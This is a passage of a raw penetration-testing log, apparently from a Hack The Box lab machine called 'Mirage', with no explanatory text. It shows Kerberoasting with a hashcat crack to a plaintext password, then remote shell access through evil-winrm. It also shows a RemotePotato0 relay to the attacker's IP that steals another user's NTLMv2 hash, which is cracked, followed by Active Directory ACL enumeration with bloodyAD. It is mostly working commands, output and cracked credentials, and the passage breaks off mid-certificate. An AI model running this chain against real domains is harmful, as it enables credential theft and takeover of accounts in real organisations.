LDAP        10.10.11.78     389    DC01             [*] Skipping disabled account: krbtgt
LDAP        10.10.11.78     389    DC01             [*] Total of records returned 1
LDAP        10.10.11.78     389    DC01             [*] sAMAccountName: nathan.aadam, memberOf: ['CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb', 'CN=IT_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb'], pwdLastSet: 2025-06-23 18:18:18.584667, lastLogon: 2025-11-28 20:42:58.987148
LDAP        10.10.11.78     389    DC01             $krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb\nathan.aadam*$f6b2be3a421ffb1a5f19d2356c05d9a5$7c3218617ec953899ccc8ea1e96711bf27ebb9271bb99e4529da48ad122e7aa4b99174303e4ccd2f62dddff955534ec1f57790fad6f74b61563598688fe3bfa66b6bdaf1efc22e8121ef066e6a484c5b9f3217235b6522183566b42ea08681ca071d270f6719cea2432079344e78533994fc89caa36ca695d5880080cd0249d5a51621cb87c2669219ab4d4d19a79f75ac29c7189616a5061ce7f96d9b2f823a8805bde3d2e46a2b7384bf2d5024178273cb89a6530ca8fd0fbac6badf39d723bfb3f54657b8a2828124c03d0380478bf46a9774eb12ba5c52b7a7dd35ecb633f9587660dc2e8fb76f8d6df7c8aa2a59b16ce5db8754125269a2810755a21e45592ec45db28484b20cee8bf05a2112b5caba8059a202bb1714a3eab27d7dc39a4e8dd9c83c9f3555d4624ca1f14537f1e8ba87a41f47f70b49acad1b4666da7b7af6c5a19b30630cd7f423624786b54ccdf4f78c6ccc0a5f02a11119f0992c979075d13aa53ab15f02ff7d8ed0cb51e3b5098f90857bbbd3c2fcdbc90de4a4c8bacd087023fb7694cfa0ae26046f4d7dcdeba608b752c18bc526196ecb9a080a038653bb3e8be8f78562edc7e810f41d44c188ce234a7972b8b4b75f472cbb449114f88d7c737a695c5b07e92ce126dbc96fddbed68d2cab91beeb4f59c769a231d3c47df0ad11047125d883870acbb4e6cd97f1ec476fdb2b4913b2aa187bde26db93fd375c3922e9c7d7a7067bd49b3fd6fa08987fd072159c8eae29212ffe41d504f48e885afcf3313d16acc7041d3cec0a88f8937b901c660230ec4f9ed05de821f31115ad0def5be4c0bba6b9f6add85672746b6e7d621c998518107b063eb8607ef89bdbfe22ba9fa96131424856f3f9c3f66465c0fccb6179f68dacc30b401f8a5f85079c0eda125702b1423cdee1ada3aafe5f9da482ca1ec61a9cb7d92ab408d50b728ed0ded31c5c4ea95738a5f17e6bc67bcd063fc7d1c3a1e16ac829b0bca889cabfa49aada23d758924b2e9b9c7f3204098b56b144e903a4604db48b9b5b66215c59ef44459c5eaf99a3834d6fb6766f05148232d36e7ae3bc76dd60c945046e1ad79a2ac2a16a8f73a7284f4ce382e49622b5e4fd6c4cea2d032b4fa9bf4dd44590c792e7e34658ac788df61068470ce5269c5b9cb828ba499b205377645022573fee308923a4d2fbc4f3950caead817722c2ff08bfeacf1866fc8a048a5122572cec92eeb1862daa08b69deeab183bb25a0937cb50bd75f3a8de8a56a5b232a5729858f73245611ec8b4958c57c719c43577a9de5a7f54ee40d724558db22f5b5baea6cb89af5c8ad17868e7c38b7933807160253fdfef0ef9d474756aec2ffd9105fa3c2476e910ea11596955a80967f1f3e143a817cff2ee32702c68152c83d7394672ea2b66fbefb126a5fefa26013dab52a6273480f47cb8e42355ae73cb27ffa3491253297553414799e2b48e3e64a059abfc66c76a0b9877832f371981ab78790b779e7dffd0dff6808e26ff30ed5b18a64e406ffd095f79ad258b8f2e8b4f88bc9111af14a8facdfa45c10141266

hashcat -m 13100 hash_mirage.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 7.1  Linux, Release, RELOC, LLVM 20.1.8, SLEEF, DISTRO, CUDA, POCL_DEBUG) - Platform #1 [The pocl project]
======================================================================================================================================
* Device #01: cpu-haswell-Intel(R) Core(TM) i5-10400 CPU @ 2.90GHz, 1452/2905 MB (1452 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory allocated for this attack: 513 MB (1140 MB free)

Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb\nathan.aadam*$f6b2be3a421ffb1a5f19d2356c05d9a5$7c3218617ec953899ccc8ea1e96711bf27ebb9271bb99e4529da48ad122e7aa4b99174303e4ccd2f62dddff955534ec1f57790fad6f74b61563598688fe3bfa66b6bdaf1efc22e8121ef066e6a484c5b9f3217235b6522183566b42ea08681ca071d270f6719cea2432079344e78533994fc89caa36ca695d5880080cd0249d5a51621cb87c2669219ab4d4d19a79f75ac29c7189616a5061ce7f96d9b2f823a8805bde3d2e46a2b7384bf2d5024178273cb89a6530ca8fd0fbac6badf39d723bfb3f54657b8a2828124c03d0380478bf46a9774eb12ba5c52b7a7dd35ecb633f9587660dc2e8fb76f8d6df7c8aa2a59b16ce5db8754125269a2810755a21e45592ec45db28484b20cee8bf05a2112b5caba8059a202bb1714a3eab27d7dc39a4e8dd9c83c9f3555d4624ca1f14537f1e8ba87a41f47f70b49acad1b4666da7b7af6c5a19b30630cd7f423624786b54ccdf4f78c6ccc0a5f02a11119f0992c979075d13aa53ab15f02ff7d8ed0cb51e3b5098f90857bbbd3c2fcdbc90de4a4c8bacd087023fb7694cfa0ae26046f4d7dcdeba608b752c18bc526196ecb9a080a038653bb3e8be8f78562edc7e810f41d44c188ce234a7972b8b4b75f472cbb449114f88d7c737a695c5b07e92ce126dbc96fddbed68d2cab91beeb4f59c769a231d3c47df0ad11047125d883870acbb4e6cd97f1ec476fdb2b4913b2aa187bde26db93fd375c3922e9c7d7a7067bd49b3fd6fa08987fd072159c8eae29212ffe41d504f48e885afcf3313d16acc7041d3cec0a88f8937b901c660230ec4f9ed05de821f31115ad0def5be4c0bba6b9f6add85672746b6e7d621c998518107b063eb8607ef89bdbfe22ba9fa96131424856f3f9c3f66465c0fccb6179f68dacc30b401f8a5f85079c0eda125702b1423cdee1ada3aafe5f9da482ca1ec61a9cb7d92ab408d50b728ed0ded31c5c4ea95738a5f17e6bc67bcd063fc7d1c3a1e16ac829b0bca889cabfa49aada23d758924b2e9b9c7f3204098b56b144e903a4604db48b9b5b66215c59ef44459c5eaf99a3834d6fb6766f05148232d36e7ae3bc76dd60c945046e1ad79a2ac2a16a8f73a7284f4ce382e49622b5e4fd6c4cea2d032b4fa9bf4dd44590c792e7e34658ac788df61068470ce5269c5b9cb828ba499b205377645022573fee308923a4d2fbc4f3950caead817722c2ff08bfeacf1866fc8a048a5122572cec92eeb1862daa08b69deeab183bb25a0937cb50bd75f3a8de8a56a5b232a5729858f73245611ec8b4958c57c719c43577a9de5a7f54ee40d724558db22f5b5baea6cb89af5c8ad17868e7c38b7933807160253fdfef0ef9d474756aec2ffd9105fa3c2476e910ea11596955a80967f1f3e143a817cff2ee32702c68152c83d7394672ea2b66fbefb126a5fefa26013dab52a6273480f47cb8e42355ae73cb27ffa3491253297553414799e2b48e3e64a059abfc66c76a0b9877832f371981ab78790b779e7dffd0dff6808e26ff30ed5b18a64e406ffd095f79ad258b8f2e8b4f88bc9111af14a8facdfa45c10141266:3edc#EDC3
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb\nat...141266
Time.Started.....: Sat Nov 29 01:41:00 2025 (8 secs)
Time.Estimated...: Sat Nov 29 01:41:08 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:  1470.3 kH/s (1.52ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12472320/14344384 (86.95%)
Rejected.........: 0/12472320 (0.00%)
Restore.Point....: 12468224/14344384 (86.92%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 3garden9 -> 3aelmejor
Hardware.Mon.#01.: Util: 69%

Started: Sat Nov 29 01:40:39 2025
Stopped: Sat Nov 29 01:41:10 2025

Username: nathan.aadam
Password: 3edc#EDC3

nxc ldap 10.10.11.78 -u nathan.aadam -p '3edc#EDC3' -k
LDAP        10.10.11.78     389    DC01             [*] None (name:DC01) (domain:mirage.htb) (signing:None) (channel binding:Never) (NTLM:False)
LDAP        10.10.11.78     389    DC01             [+] mirage.htb\nathan.aadam:3edc#EDC3

nxc winrm 10.10.11.78 -u nathan.aadam -p '3edc#EDC3' -k
[01:46:41] ERROR    Invalid NTLM challenge received from server. This may indicate NTLM is not supported and nxc winrm only support NTLM currently                                                  winrm.py:59
WINRM       10.10.11.78     5985   10.10.11.78      [*] None (name:10.10.11.78) (domain:None) (NTLM:False)

nxc smb 10.10.11.78 -u nathan.aadam -p '3edc#EDC3' -k --generate-krb5-file mirage.htb
SMB         10.10.11.78     445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         10.10.11.78     445    dc01             [+] krb5 conf saved to: mirage.htb
SMB         10.10.11.78     445    dc01             [+] Run the following command to use the conf file: export KRB5_CONFIG=mirage.htb
SMB         10.10.11.78     445    dc01             [+] mirage.htb\nathan.aadam:3edc#EDC3

sudo cp mirage.htb /etc/krb5.conf

getTGT.py 'mirage.htb/nathan.aadam:3edc#EDC3'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in nathan.aadam.ccache

KRB5CCNAME=nathan.aadam.ccache evil-winrm -i dc01.mirage.htb --realm mirage.htb
/usr/lib/ruby/gems/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/usr/lib/ruby/gems/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
/usr/lib/ruby/gems/3.4.0/gems/rexml-3.4.4/lib/rexml/xpath.rb:67: warning: REXML::XPath.each, REXML::XPath.first, REXML::XPath.match dropped support for nodeset...
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> cd ..
*Evil-WinRM* PS C:\Users\nathan.aadam> cd Desktop
*Evil-WinRM* PS C:\Users\nathan.aadam\Desktop> type user.txt

User flag

ea87************************f987

*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> get-process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    207       8     7576      12292              3784   0 AggregatorHost
    397      33    12780      21960              3000   0 certsrv
    486      22     2124       6472               444   0 csrss
    277      15     2028       6228               556   1 csrss
    366      15     3220      15344              5172   1 ctfmon
    417      34    16652      25356              2460   0 dfsrs
    160       9     2000       6416              3076   0 dfssvc
    281      15     3908      15076              4032   0 dllhost
  10410    7487   129584     129180              2100   0 dns
    750      36    24536      54452              1268   1 dwm
   1596      63    26716      92228              5488   1 explorer

*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> qwinsta
qwinsta.exe : No session exists for *
    + CategoryInfo          : NotSpecified: (No session exists for *:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

RunasCs

*Evil-WinRM* PS C:\programdata> .\r.exe nathan.aadam 3edc#EDC3 qwinsta
[*] Warning: The logon for user 'nathan.aadam' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
>services                                    0  Disc
 console           mark.bbond                1  Active

RemotePotato0

*Evil-WinRM* PS C:\programdata> .\rp.exe -m 2 -r 10.10.15.236 -c 1
[!] Detected a Windows Server version not compatible with JuicyPotato, you cannot run the RogueOxidResolver on 127.0.0.1. RogueOxidResolver must be run remotely.
[!] Example Network redirector:
	sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999

sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.78:9999

*Evil-WinRM* PS C:\programdata> .\rp.exe -x 10.10.15.236 -m 2 -s 1
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (null) to your victim machine on port 9999
[*] Example Network redirector:
	sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] RPC relay server listening on port 9997 ...
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 106 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!

NTLMv2 Client	: DC01
NTLMv2 Username	: MIRAGE\mark.bbond
NTLMv2 Hash	: mark.bbond::MIRAGE:0e8023f0b0a15b3f:ba4867f0072e0610c664ad0c9f87b514:0101000000000000925fa8669b61dc01ac9aec1bea3666af0000000002000c004d0049005200410047004500010008004400430030003100040014006d00690072006100670065002e0068007400620003001e0064006300300031002e006d00690072006100670065002e00680074006200050014006d00690072006100670065002e0068007400620007000800925fa8669b61dc010600040006000000080030003000000000000000010000000020000004a99c3ae127b7ac5883ea4e37db2a60636393002a3472c1c26384141c79b8530a00100000000000000000000000000000000000090000000000000000000000

echo 'mark.bbond::MIRAGE:0e8023f0b0a15b3f:ba4867f0072e0610c664ad0c9f87b514:0101000000000000925fa8669b61dc01ac9aec1bea3666af0000000002000c004d0049005200410047004500010008004400430030003100040014006d00690072006100670065002e0068007400620003001e0064006300300031002e006d00690072006100670065002e00680074006200050014006d00690072006100670065002e0068007400620007000800925fa8669b61dc010600040006000000080030003000000000000000010000000020000004a99c3ae127b7ac5883ea4e37db2a60636393002a3472c1c26384141c79b8530a00100000000000000000000000000000000000090000000000000000000000' > mark.hash

hashcat mark.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 

MARK.BBOND::MIRAGE:0e8023f0b0a15b3f:ba4867f0072e0610c664ad0c9f87b514:0101000000000000925fa8669b61dc01ac9aec1bea3666af0000000002000c004d0049005200410047004500010008004400430030003100040014006d00690072006100670065002e0068007400620003001e0064006300300031002e006d00690072006100670065002e00680074006200050014006d00690072006100670065002e0068007400620007000800925fa8669b61dc010600040006000000080030003000000000000000010000000020000004a99c3ae127b7ac5883ea4e37db2a60636393002a3472c1c26384141c79b8530a00100000000000000000000000000000000000090000000000000000000000:1day@atime

bloodyAD --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' -k get object mark.bbond

distinguishedName: CN=mark.bbond,OU=Users,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
accountExpires: 1601-01-01 00:00:00+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: mark.bbond
codePage: 0
countryCode: 0
dSCorePropagationData: 2025-07-04 19:36:40+00:00
displayName: mark.bbond
givenName: mark.bbond
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-11-30 01:55:43.828732+00:00
lastLogonTimestamp: 2025-11-29 22:02:00.155102+00:00
logonCount: 63
logonHours: ////////////////////////////
memberOf: CN=IT_Support,OU=Groups,OU=Support,OU=IT_Staff,DC=mirage,DC=htb
nTSecurityDescriptor: O:S-1-5-21-2127163471-3824721834-2568365109-512G:S-1-5-21-2127163471-3824721834-2568365109-512D:AI(OA;;RP;4c164200-20c0-11d0-a768-00aa006e0529;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;RP;037088f8-0ae1-11d2-b422-00a0c968f939;;S-1-5-21-2127163471-3824721834-2568365109-553)(OA;;WP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-21-2127163471-3824721834-2568365109-1112)(OA;;0x30;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-2127163471-3824721834-2568365109-517)(OA;;RP;46a9b11d-60ae-405a-b7e8-ff8a58d456d2;;S-1-5-32-560)(OA;;0x30;6db69a1c-9422-11d1-aebd-0000f80367c1;;S-1-5-32-561)(OA;;0x30;5805bc62-bdc9-4428-a5e2-856a0f4c185e;;S-1-5-32-561)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-1-0)(OA;;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;CR;ab721a54-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;CR;ab721a56-1e2f-11d0-9819-00aa0040529b;;S-1-5-10)(OA;;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;;S-1-5-11)(OA;;RP;e48d0154-bcf8-11d1-8702-00c04fb96050;;S-1-5-11)(OA;;RP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-11)(OA;;RP;e45795b3-9455-11d1-aebd-0000f80367c1;;S-1-5-11)(OA;;0x30;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-10)(OA;;0x30;e45795b2-9455-11d1-aebd-0000f80367c1;;S-1-5-10)(OA;;0x30;e45795b3-9455-11d1-aebd-0000f80367c1;;S-1-5-10)(A;;0x20014;;;S-1-5-21-2127163471-3824721834-2568365109-1112)(A;;0xf01ff;;;S-1-5-21-2127163471-3824721834-2568365109-512)(A;;0xf01ff;;;S-1-5-32-548)(A;;RC;;;S-1-5-11)(A;;0x20094;;;S-1-5-10)(A;;0xf01ff;;;S-1-5-18)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2127163471-3824721834-2568365109-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2127163471-3824721834-2568365109-527)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-2127163471-3824721834-2568365109-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
name: mark.bbond
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=mirage,DC=htb
objectClass: top; person; organizationalPerson; user
objectGUID: 79eb49f6-5fdb-4568-839d-308a03810bd4
objectSid: S-1-5-21-2127163471-3824721834-2568365109-1109
primaryGroupID: 513
pwdLastSet: 2025-06-23 21:18:18.678382+00:00
sAMAccountName: mark.bbond
sAMAccountType: 805306368
uSNChanged: 163940
uSNCreated: 24667
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
userCertificate: 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; MIIGNTCCBR2gAwIBAgITSQAAAATp2KKlRprtAQAAAAAABDANBgkqhkiG9w0BAQsFADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdlMRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAeFw0yNTA1MjQwMTQ1NTJaFw0yNjA1MjQwMTQ1NTJaMHcxEzARBgoJkiaJk/IsZAEZFgNodGIxFjAUBgoJkiaJk/IsZAEZFgZtaXJhZ2UxETAPBgNVBAsMCElUX1N0YWZmMRAwDgYDVQQLEwdTdXBwb3J0MQ4wDAYDVQQLEwVVc2VyczETMBEGA1UEAxMKbWFyay5iYm9uZDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKNQw25rd8Z2lmyo5MUekAf1o33B6ICK9RiJwsh2MB+sflB0dLL3fDURjlpWF/aV0vtrTiajPHWa1rhc4Gf2HbkKntjVZnYsiqAPD5Dokuf8v1WUC1Dvqj0x66HKvdRMZMDsVqxJOBBOAwivdOkXmTApjNVAnh69asU8WoXHQJ/yUUqkQ06pb2QdpSwDkot76ZCoFUvygNxhGzkF7LUOI4JyGapUxIWK1JljEZlPOHi/pFqzuI4hnUDjpazgSwV4xdzRkFdW4AXcCZEl/6uh/FIPs6c77D8FQm1ST1yIuWLQ0mybcP6pcFFinKGEG3aap/BI7xNVO2ZoVnsi/Ya4xDcCAwEAAaOCAukwggLlMB0GA1UdDgQWBBRR+pbhikv+V6vdLvIIhpVsKvKqnTAfBgNVHSMEGDAWgBTooU8mN677jIcysXm/uHWrhRkQfDCByAYDVR0fBIHAMIG9MIG6oIG3oIG0hoGxbGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSxDTj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8vL0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwFwYJKwYBBAGCNxQCBAoeCABVAHMAZQByMA4GA1UdDwEB/wQEAwIFoDApBgNVHSUEIjAgBgorBgEEAYI3CgMEBggrB